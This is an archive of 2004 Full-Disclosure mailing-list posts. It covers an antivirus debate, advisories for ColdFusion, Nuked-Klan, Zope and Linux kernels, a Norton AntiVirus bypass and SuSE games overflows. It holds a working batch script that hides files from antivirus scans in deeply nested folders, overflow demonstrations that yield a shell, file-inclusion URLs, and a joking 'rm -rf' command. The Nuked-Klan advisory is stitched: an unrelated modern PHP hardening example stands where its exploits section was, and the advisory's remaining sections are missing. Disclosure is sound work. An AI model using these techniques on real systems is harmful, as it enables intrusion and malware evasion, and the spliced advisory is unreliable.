Re[2]: [inbox] Re: [Full-Disclosure] Hi! Antiviruses Comparison - A Little Research Results

2004-04-17 Thread 3APA3A
Dear Curt Purdy,

--Friday, April 16, 2004, 10:39:14 PM, you wrote to [EMAIL PROTECTED]:


CP> Been following this thread and I can bite my tongue no longer.  As a
CP> long-time user of the first AV in the world, F-Secure, then F-Prot in '88, I
CP> have found it to be the only AV that could detect and remove every virus I
CP> have ever come upon, including multiple instances where fully updated Norton
CP> and McAfee either did not detect or could not remove them.

CP> They were the first AV with signature auto-updating over 4 years ago. And it
CP> does not update once a week or once a day, but continually checks on an
CP> hourly basis for new sigs.  It has three separate scan engines, so it's like
CP> having a layered defense in one product.  And it operates at the lowest
CP> level of any AV I am aware of, running at the base level of I/O, actually
CP> grabbing it off the disk before any other process can touch it, making it
CP> extremely fast and efficient with no noticeable impact in performance, even on
CP> slow boxes.  My $.02

CP> Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA
CP> Information Security Engineer
CP> DP Solutions

Do you remember the Nimda worm? It was probably the first worm to exploit
an Outlook Express vulnerability to launch itself automatically. On Windows
NT 4.0 the F-Secure engine (well, it was a few years ago, I don't remember
the version) had a problem - it caught this worm _after_ it was executed. And
the worm successfully spread from the protected machine in approx. 50% of
cases...



-- 
~/ZARAZA
Stop trying - nothing will come of it. (Twain)

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Network Intelligence Advisory - Denial of Service Vulnerability in ColdFusion MX

2004-04-17 Thread K. K. Mookhey
Name: Denial of Service Vulnerability in ColdFusion MX
Systems Affected: Version 6.0 and earlier
Severity: Medium-High
Category: Denial of Service
Vendor URL: Macromedia ColdFusion MX
Discovered by: Network Intelligence (I) Pvt. Ltd. (www.nii.co.in)
Online location: http://www.nii.co.in/vuln/cfdos.html

Description

ColdFusion MX is the solution for building and deploying powerful web
applications and web services. Using the proven tag-based scripting and
built-in services in ColdFusion MX, web application developers can easily
harness the power of the Java platform without the complexity. Available for
stand-alone installation or for deployment on industry-leading J2EE
application servers, ColdFusion enables over 10,000 customers and hundreds
of thousands of developers worldwide to deliver powerful web applications in
record time.

Vulnerability Details
==
When the ColdFusion MX Server attempts to write an error message with an
oversized string as part of the error message, the server's memory usage
shoots up and stays there until the server completes writing the error
message. This message is written on to a web page, as well as into
ColdFusion's Application.log file. If this error is induced repeatedly, the
entire memory on the server is used up and a Java out-of-memory condition
occurs. We tested this by inducing the error ten times in a row.

Impact
=
When the memory usage goes high, genuine requests can no longer be handled.
Attempts to stop and restart the ColdFusion server using the Windows
Service's applet or the cfstop.bat script fail. During our tests, the only
way to get out of the attack was to restart the server.

Exploitation

To exploit this vulnerability, the attacker would need to induce an error in
the processing of the CFM pages. This could be done by supplying a long
string (we needed about 2-3 MB) of data as a GET or POST request to a
function that does not handle that data type or the length. For instance,
this error was induced by supplying the string to the DateFormat() function,
which formats the supplied string into a date value of the specified format.
Ten such requests will cause the ColdFusion server to completely hang and
require a manual reboot. Another method of inducing this error is for someone
to upload a malicious CFM page, which contains code such as:

**Start of code**


#the_date#
**End of code**

This is a feasible scenario for a web-hosting company that provides shared
hosting services to multiple clients. A malicious user of the service may
try to disable the web-hosting company's servers by uploading this page, and
accessing it a dozen times from his browser.

Vendor Response:
=
The vendor had assigned CFMX bug #51267 to it, and has patched this bug in
the current latest release of this software: ColdFusion MX Server 6.1. This
is available as a free upgrade to existing users. In the new version, the
length of the error string is limited to 256 bytes.

Workaround
=
In case upgrading the server is not feasible immediately, you could create
your own error reporting template and set this in the ColdFusion
Administrator "Settings" page as the "Site-wide Error Handler" - the memory
consumption is moderate. You must ensure that the customized error page does
not contain the string that causes the error.

Disclaimer
===
The information contained in this advisory is copyright (c) 2004 Network
Intelligence India Pvt. Ltd. (www.nii.co.in). This advisory may be
redistributed, provided that no fee is assigned and that the advisory is not
modified in any way.

About us
===
Network Intelligence is a security consulting firm specializing in
vulnerability research, application security audits, penetration testing,
intrusion detection & analysis, BS7799 consulting, and overall information
assurance services. More information about our list of security services is
at http://www.nii.co.in/services.html We also have our range of security
auditing products for Windows, Oracle and SQL Server. More information on
these products is available at http://www.nii.co.in/products.html




[Full-Disclosure] [SCSA-028] Nuked-Klan Multiple Vulnerabilities

2004-04-17 Thread advisory
=
Security Corporation Security Advisory [SCSA-028]

Nuked-Klan Multiple Vulnerabilities
= 

PROGRAM: Nuked-KlaN
HOMEPAGE: http://www.nuked-klan.org
VULNERABLE VERSIONS: b1.4, b1.5, SP2
RISK: MEDIUM/HIGH
IMPACT: Config File Destruction
Local Files Include
Globals Vars Overwriting

RELEASE DATE: 2004-04-16


=
TABLE OF CONTENTS
=

1. DESCRIPTION
2. DETAILS
3. EXPLOITS
4. SOLUTIONS
5. WORKAROUND
6. DISCLOSURE TIMELINE
7. CREDITS
8. DISCLAIMER
9. REFERENCES
10. FEEDBACK


1. DESCRIPTION
=

Nuked-Klan is a complete CMS with a few interesting modules.

More information is available at http://www.nuked-klan.org


2. DETAILS
=


In the file index.php, we can see the include of nuked.php :
--
include ("nuked.php");
--
In nuked.php are the lines :
---
[...]
include ("conf.inc.php");
[...]
if ($user_langue == ""){$language=$nuked[langue];}
else {$language=$user_langue;}

include ("lang/$language");
[...]
---
A file "lang/$language" is thus included.
This variable can be modified by anyone, through the variable named $user_langue.
Anyone can thus include a file from the HD in Nuked-Klan b1.5 and earlier.


In version b1.5 there are a few other holes.
In the file globals.php are the lines:
---
[...]
nk_globals('HTTP_GET_VARS');
nk_globals('HTTP_POST_VARS');
nk_globals('HTTP_COOKIE_VARS');
nk_globals('HTTP_SERVER_VARS');
[...]
---
The nk_globals() function can be found in nuked.php:
---
function nk_globals($table) {
    if (is_array($GLOBALS[$table])) {
        reset($GLOBALS[$table]);
        while (list($key, $val) = each($GLOBALS[$table])) {
            $GLOBALS[$key] = $val;
        }
    }
}
---
This function creates global variables. Their names and values are taken from
the table $table (here the GET, POST, COOKIE and SERVER tables).
When these lines are executed in globals.php, the GET, POST and COOKIE vars
become GLOBAL vars.
But if these GLOBAL vars already exist, they are overwritten.

So if the file globals.php is included after the config vars (in conf.inc.php),
then anyone can give new values to these vars.
It is possible in index.php:
---
[...]
if($page!=""){$im_file="$page";}else{$im_file="index";}
}

if (is_file("modules/$file/$im_file.php") ){
include("modules/$file/$im_file.php");
}else{
include("modules/404/index.php");
}
[...]
---
which could include globals.php with the URL:
http://[target]/index.php?file=..&page=globals
Or:
http://[target]/index.php?user_langue=../globals.php
This last URL allows overwriting GLOBALS[] in every module, like Suggest
(modules/Suggest/index.php):
---

[...]
function add_sug($data)
{
global $user, $module, $nuked;

opentable();

include("modules/Suggest/modules/$module.php");
$date=time();
$content=make_array($data);
$sql=mysql_query("INSERT INTO $nuked[prefix]"._suggest." VALUES 
('','$module','$user[0]','$content','$date')");
echo"

"._YOURSUGGEST."
"._THXPART."

";
redirect("index.php?file=$module",2);

closetable();
}
[...]
---

Here we can change $nuked[prefix] and then insert what we want in the database.



The last problem in b1.5 is the file update.php :
---

';


$fp = fopen('conf.inc.php', w);
if (!$fp) die (sprintf('Erreur File Open','conf.inc.php','conf.inc.php'));
fwrite($fp, $content);
fclose($fp);
[...]
}

[...]

switch ($action)
{
[...]
case"edit_config":
edit_config($_GET['op']);
break;

case"update_config":
update_config($_POST);
break;

case"install":
install();
break;
[...]
}

?>
---

This file can include a local file too via $langue, and the update_config()
function can overwrite the config file.



3. EXPLOITS
=

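The hardening a maintainer would apply to the nuked.php / globals.php pattern quoted in the DETAILS section above, as an added example (not Nuked-Klan's own code): the function names nk_globals_safe() and resolve_lang_file(), the allowlisted request keys and the language file names are all assumed.

```php
<?php
// Added example, not Nuked-Klan's own code. The two changes below close the
// holes described in the advisory: request variables no longer clobber
// config globals, and the language file is chosen from a fixed list instead
// of being built from the request.

// Replacement for nk_globals(): copy only expected request keys, and never
// overwrite a global that already exists (such as $nuked from conf.inc.php).
// Returns the keys that were refused, so the caller can log them.
function nk_globals_safe(array $source, array $allowed): array
{
    $skipped = [];
    foreach ($source as $key => $val) {
        if (!in_array($key, $allowed, true) || array_key_exists($key, $GLOBALS)) {
            $skipped[] = $key;   // unexpected key, or it would clobber config
            continue;
        }
        $GLOBALS[$key] = $val;
    }
    return $skipped;
}

// Replacement for include("lang/$language"): the request may only select one
// of a fixed set of shipped files, so a traversal value such as
// "../globals.php" never reaches include(). File names are assumed.
function resolve_lang_file(?string $user_langue, string $default): string
{
    $allowed = ['english', 'french'];
    $lang = ($user_langue === null || $user_langue === '') ? $default : $user_langue;
    if (!in_array($lang, $allowed, true)) {
        $lang = $default;        // unknown or traversal value: fall back
    }
    return 'lang/' . $lang . '.php';
}

// --- demonstration with constructed data --------------------------------
// Stand-in for what conf.inc.php would define.
$nuked = ['prefix' => 'nuked_', 'langue' => 'english'];

// Constructed request of the shape the advisory describes: one key tries to
// replace $nuked[prefix], the other tries to traverse out of lang/.
$request = [
    'nuked'       => ['prefix' => 'evil_'],
    'user_langue' => '../globals.php',
    'page'        => 'index',
];

$skipped = nk_globals_safe($request, ['user_langue', 'page', 'file']);
$file    = resolve_lang_file($GLOBALS['user_langue'] ?? null, $nuked['langue']);

printf("refused keys : %s\n", implode(', ', $skipped));
printf("table prefix : %s\n", $nuked['prefix']);
printf("language file: %s\n", $file);
```

Run with `php nk_hardening.php`: the `nuked` key is refused because the config global already exists, and the traversal value in `user_langue` is replaced by the configured default.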
RE: Re[2]: [inbox] Re: [Full-Disclosure] Hi! Antiviruses Comparison - A Little Research Results

2004-04-17 Thread Curt Purdy
3APA3A wrote:
> Do you remember Nimda worm? It was probably first worm to exploit
> Outlook Express vulnerability to launch itself automatically. On Windows
> NT 4.0 F-Secure engine (well, it was few years ago, I don't remember
> version) had a problem - it catch this worm _after_ it was executed. And
> worm successfully spreads from protected machine approx. in ~50% of
> cases...

Yes, remember Nimda quite well, we made a lot of money over a couple of
weeks cleaning up operations using Norton Enterprise.  However, we had
around 80 boxes in the DMZ with full Internet public ip's protected with
F-Secure and none got it.

Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA
Information Security Engineer
DP Solutions



If you spend more on coffee than on IT security, you will be hacked.
What's more, you deserve to be hacked.
-- White House cybersecurity adviser Richard Clarke



[Full-Disclosure] Internet Explorer XSS published unpatched in SP1 AND SP2

2004-04-17 Thread Rafel Ivgi, The-Insider
Hi!

2 weeks ago I discovered this XSS:
s
in Internet Explorer (fully patched and with SP2).
I also discovered that Liu Die Yu (greetings pal) discovered it a long time
ago.

More details at:
http://www.securiteam.com/windowsntfocus/6J006156AS.html

This means it was not patched, even in SP2.
This vulnerability does not affect Outlook Express.
Rafel Ivgi, The-Insider.



[Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....

2004-04-17 Thread bipin gautam
Norton AntiVirus nested file manual scan bypass.

Product Version: Norton Antivirus 2002 (~Only tested on...~)
Risk Impact: Medium

Summary:

If you manage to inject a file in the sub-directory(s) beyond what the
Windows OS can create normally [say in the 130th+ sub-directory at
c:\..\..\..\ up to the 130th ...], NAV fails to scan the NESTED FILE. Indeed,
it's more a Windows restriction in accessing the nested file than an
ANTIVIRUS flaw. Other antivirus products should also suffer the same.
*.PLEASE VERIFY.* NAV

=---CUT--=
@echo off
rem Bipin Gautam [hUNT3R]
rem [http://www.geocities.com/visitbipin] * [http://www.01security.com]
echo »
echo 
echo -( For  a  harmless   test...  you   can use,
echo http://www.eicar.org/anti_virus_test_file.htm )-
echo 
pause
cd\
c:
cd\
:hUNT3r 
md 1 
cd 1 
if not errorlevel  1 goto :hUNT3r
cd..
rmdir 1
md X
cls
echo ***
echo  Now you can inject any file inside the folder 'X' which is inside 
echo 120'th sub-directory of 'c:\1' [ i.e c:\1\..\...\.[120'th dir].\X\ ] 
echo Note: The file you are moving to 'c:\1\...\X\' should only contain 
echo '1' char. file name, say: '1.exe' or '2.exe' or 'a.exe' etc... 
echo not as '123.not' 'qwert.hak'
echo .
echo   So, ARE YOU DONE!?
echo . 
echo   After  this  batch   script  is  terminated, you'll
echo   find the file you ^just copied^ inside c:\1\\X\ 
echo   now in c:\3\3\3\3\3\1\1\1\..[130' th dir].\X\
echo   mmm... Then have a  manual scan of c:\3\ Any file you
echo   have put inside the dir. 'X' can't be detected by NORTON Antivirus anymore!!!
echo ***

pause
cd\
md 3\3\3\3\3\3\3\3\3\3\
cd\
xcopy /E /I c:\1\*.* c:3\3\3\3\3\3\3\3\3\3\
exit

=---CUT--=

Disclaimer: The information in the advisory is
believed to be accurate at the time of printing based
on currently available information. Use of the
information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this
information. Neither the author nor the publisher
accepts any liability for any direct, indirect or
consequential loss or damage arising from use of, or
reliance on this information.






[Full-Disclosure] Suse 9.0 Multiple gid = 20(games) vulnz

2004-04-17 Thread narko tix
   - S3CTI0N 0x01 -
 
-Bug : Suse 9.0 /usr/games/mille l0c4l l4m3 st4ck 0v3rfl0w.(Wh3n s4vin9 th3 g4m3).
   Pr0gr4m  suid3d t0 games wi7h d3f4ul7.   

-3xpl0i747i0n : 0x01-) m4nu4l-)  112 byt3s fil3n4m3 is 3n0ugh for m4nu4lly 
3xpl0i747i0n.
 us3 y0ur ASCII r3t 4ddr3ss for fil3n4m3.

0x02-) 3xpl0i7-) Us3 Sh3llc0d3 which unfilt3rs '\x0b' ,'\n', 
'\x90','\220' ch4r4ct3rs.
XOR them.'c4us3 mill3 c0nv3rts th4t shi77y ch4r4ct4rs to '~P'. 
3sp3ci4lly 0x90 4nd \220.
Us3 y0ur 0wn sh3llc0d3 in th3 4tt4ch3d c0d3.
-D3m0ns7r4ti0n:

[EMAIL PROTECTED]:~/c-hell$ ./env
RET =  þÿ¿

[EMAIL PROTECTED]:~/c-hell$ /usr/games/mille
--HAND----DECK--|      -
P 89|Hand Total 0 0
1 75--DISCARD-- |   -  -
2 Go| Overall Total 0 0 
3 Gasoline  |  Games0 0
4 Repairs   file:  þÿ¿ þÿ¿ þÿ¿ þ|  
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| p: pickq: quit
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| u: use #   o: order hand
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| d: discard #   s: save  
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| w: toggle window   r: reprint
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ|  
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ sh-2.05b$ uid=1001(addicted) gid=20(games) 
groups=100(users)



   - S3CTI0N 0x02 -   

-Bug : Suse 9.0 /usr/games/monop l0c4l l4m3 st4ck 0v3rfl0w.7hiz iz 4n 0ld but g4m3 iz 
s7ill vuln3r4bl3.
   0v3rfl0w in 1. pl4y3rn4m3.(4ls0 th3 0th3rs)
   Pr0gr4m suid3d games by d3f4ul7
-3xpl0i747i0n : 0x01-) m4nu4l-) 304 byt3s pl4y3rn4m3 is 3n0ugh f0r 3xpl0i747i0n.
   Us3 y0ur ASCII r3t 4ddr3ss.

0x02-) 3xpl0i7-) Us3 sh3llc0d3 which is n0t c0nt4ins s0m3 ch4rs like 
'\x0b'. XOR them.
   3xpl0i7 4tt4ch3d.
-D3m0nstr4ti0n:
[EMAIL PROTECTED]:~/c-hell$ ./env
RET =  þÿ¿   
[EMAIL PROTECTED]:~/c-hell$ /usr/games/monop
How many players? 1
Player 1's name:  þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ 
þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ 
þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ 
þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ 
þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ 
þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ 
þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
sh-2.05b$ id
uid=1001(addicted) gid=20(games) groups=100(users)
sh-2.05b$ 

- S3C7I0N 0x03 -
C0nclusi0n: Th3r3 4r3 t00 m4ny bin4ri3s s7ill vuln3r4bl3 t0 7his kind 0f bugz.Bu7 I'm 
t00 B0R3D.
Quick P4tch : rm -rf /usr/games/*
---


N4rK07IX



mille.c
Description: Binary data


monopexp.c
Description: Binary data


[Full-Disclosure] [SECURITY] [DSA 489-1] New Linux 2.4.17 packages fix local root exploit (mips+mipsel)

2004-04-17 Thread debian-security-announce
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 489-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 17th, 2004 http://www.debian.org/security/faq
- --

Package: kernel-source-2.4.17 kernel-patch-2.4.17-mips
Vulnerability  : several vulnerabilities
Problem-Type   : local
Debian-specific: no
CVE ID : CAN-2004-0003 CAN-2004-0010 CAN-2004-0109 CAN-2004-0177 CAN-2004-0178

Several serious problems have been discovered in the Linux kernel.
This update takes care of Linux 2.4.17 for the PowerPC/apus and S/390
architectures.  The Common Vulnerabilities and Exposures project
identifies the following problems that will be fixed with this update:

CAN-2004-0003

A vulnerability has been discovered in the R128 driver in the Linux
kernel which could potentially lead an attacker to gain
unauthorised privileges.  Alan Cox and Thomas Biege developed a
correction for this.

CAN-2004-0010

Arjan van de Ven discovered a stack-based buffer overflow in the
ncp_lookup function for ncpfs in the Linux kernel, which could
lead an attacker to gain unauthorised privileges.  Petr Vandrovec
developed a correction for this.

CAN-2004-0109

zen-parse discovered a buffer overflow vulnerability in the
ISO9660 filesystem component of Linux kernel which could be abused
by an attacker to gain unauthorised root access.  Sebastian
Krahmer and Ernie Petrides developed a correction for this.

CAN-2004-0177

Solar Designer discovered an information leak in the ext3 code of
Linux.  In a worst case an attacker could read sensitive data such
as cryptographic keys which would otherwise never hit disk media.
Theodore Ts'o developed a correction for this.

CAN-2004-0178

Andreas Kies discovered a denial of service condition in the Sound
Blaster driver in Linux.  He also developed a correction for this.

These problems are also fixed by upstream in Linux 2.4.26 and future
versions of 2.6.

The following security matrix explains which kernel versions for which
architectures are already fixed and which will be removed instead.

Architecture   stable (woody)             unstable (sid)      remove in sid
source         2.4.17-1woody3             2.4.25-3            2.4.19-11
mips           2.4.17-0.020226.2.woody6   fixed soon          2.4.19-0.020911.8
mipsel         2.4.17-0.020226.2.woody6   2.4.25-0.040415.1   2.4.19-0.020911.9

We recommend that you upgrade your kernel packages immediately, either
with a Debian provided kernel or with a self compiled one.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody3.dsc
  Size/MD5 checksum:  690 222d67d058984eef34ef3af56ad82720

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody3.diff.gz
  Size/MD5 checksum:41918 dce13eeca598d548e390a72fed76728f

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17.orig.tar.gz
  Size/MD5 checksum: 29445154 d5de2a4dc49e32c37e557ef856d5d132


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody6.dsc
  Size/MD5 checksum:  805 2076a7b98736825eb39bf5bc8eba23d2

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody6.tar.gz

  Architecture independent components:


http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-doc-2.4.17_2.4.17-1woody3_all.deb
  Size/MD5 checksum:  1720294 3b6e8a510996bebd066d1cda8bac41eb

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody3_all.deb
  Size/MD5 checksum: 23880582 542792a28d1fc90844f9b51abe84f90e


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody6_all.deb
  Size/MD5 checksum:  1149360 9e6755113b2f9aa136cb7a661ff17953

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody6_

[Full-Disclosure] [SECURITY] [DSA 490-1] New Zope packages fix arbitrary code execution

2004-04-17 Thread debian-security-announce
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 490-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 17th, 2004 http://www.debian.org/security/faq
- --

Package: zope
Vulnerability  : arbitrary code execution
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2002-0688

A vulnerability has been discovered in the index support of the
ZCatalog plug-in in Zope, an open source web application server.  A
flaw in the security settings of ZCatalog allows anonymous users to
call arbitrary methods of catalog indexes.  The vulnerability also
allows untrusted code to do the same.

For the stable distribution (woody) this problem has been fixed in
version 2.5.1-1woody1.

For the unstable distribution (sid) this problem has been fixed in
version 2.6.0-0.1 and higher.

We recommend that you upgrade your zope package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1.dsc
  Size/MD5 checksum:  684 bae9669b048bb73ff0fb4de1cba378d4
http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1.diff.gz
  Size/MD5 checksum:88172 d8461358bc98af430ed32dd89a45dbcb
http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1.orig.tar.gz
  Size/MD5 checksum:  2165141 65d502b2acf986693576decad6b837cf

  Alpha architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_alpha.deb
  Size/MD5 checksum:  2236994 a0eb7df5046ae357d760d18ef8a2619e

  ARM architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_arm.deb
  Size/MD5 checksum:  2148088 dba70d7c78d850557783603038bc9947

  Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_i386.deb
  Size/MD5 checksum:  2130316 5172bd775bcd0ae107242525cf67b443

  Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_ia64.deb
  Size/MD5 checksum:  2388054 51c1ad0503162c4f0e152f233a45b3ca

  HP Precision architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_hppa.deb
  Size/MD5 checksum:  2240312 bbac2d795c157069d27e63ffaf0f3b5c

  Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_m68k.deb
  Size/MD5 checksum:  2133690 1662a0ece415a56d4e25ad6f31576b9f

  Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_mips.deb
  Size/MD5 checksum:  2172370 5f127d8ac54046e75c6ab9bbfe9224c1

  Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_mipsel.deb
  Size/MD5 checksum:  2170856 f57b6a66116df5b30f499f5e4cdab6aa

  PowerPC architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_powerpc.deb
  Size/MD5 checksum:  2168352 2b66d671fe1cb86a84df066902c503d0

  IBM S/390 architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_s390.deb
  Size/MD5 checksum:  2153234 97df94cbfc71001ce67d6f02e6dde798

  Sun Sparc architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_sparc.deb
  Size/MD5 checksum:  2212970 5a660d1befe3b8ba2be26439eb1d1b21


  These files will probably be moved into the stable distribution on
  its next update.

- -
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/




[Full-Disclosure] [SECURITY] [DSA 491-1] New Linux 2.4.19 packages fix local root exploit (mips)

2004-04-17 Thread debian-security-announce
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 491-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 17th, 2004 http://www.debian.org/security/faq
- --

Package: kernel-source-2.4.19 kernel-patch-2.4.19-mips
Vulnerability  : several vulnerabilities
Problem-Type   : local
Debian-specific: no
CVE ID : CAN-2004-0003 CAN-2004-0010 CAN-2004-0109 CAN-2004-0177 CAN-2004-0178

Several serious problems have been discovered in the Linux kernel.
This update takes care of Linux 2.4.17 for the MIPS architecture.  The
Common Vulnerabilities and Exposures project identifies the following
problems that will be fixed with this update:

CAN-2004-0003

A vulnerability has been discovered in the R128 driver in the Linux
kernel which could potentially lead an attacker to gain
unauthorised privileges.  Alan Cox and Thomas Biege developed a
correction for this.

CAN-2004-0010

Arjan van de Ven discovered a stack-based buffer overflow in the
ncp_lookup function for ncpfs in the Linux kernel, which could
lead an attacker to gain unauthorised privileges.  Petr Vandrovec
developed a correction for this.

CAN-2004-0109

zen-parse discovered a buffer overflow vulnerability in the
ISO9660 filesystem component of Linux kernel which could be abused
by an attacker to gain unauthorised root access.  Sebastian
Krahmer and Ernie Petrides developed a correction for this.

CAN-2004-0177

Solar Designer discovered an information leak in the ext3 code of
Linux.  In a worst case an attacker could read sensitive data such
as cryptographic keys which would otherwise never hit disk media.
Theodore Ts'o developed a correction for this.

CAN-2004-0178

Andreas Kies discovered a denial of service condition in the Sound
Blaster driver in Linux.  He also developed a correction for this.

These problems are also fixed by upstream in Linux 2.4.26 and future
versions of 2.6.

The following security matrix explains which kernel versions for which
architectures are already fixed and which will be removed instead.

Architecture   stable (woody)             unstable (sid)      remove in sid
source         2.4.19-4.woody2            2.4.25-3            2.4.19-11
mips           2.4.19-0.020911.1.woody4   2.4.25-0.040415.1   2.4.19-0.020911.8

We recommend that you upgrade your kernel packages immediately, either
with a Debian provided kernel or with a self compiled one.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody2.dsc
  Size/MD5 checksum:  672 9860f430fe435100c103a42c7b5dbc66

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody2.diff.gz
  Size/MD5 checksum:47625 cc802c42472c637de501dde07df7cec8

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz
  Size/MD5 checksum: 32000211 237896fbb45ae652cc9c5cecc9b746da


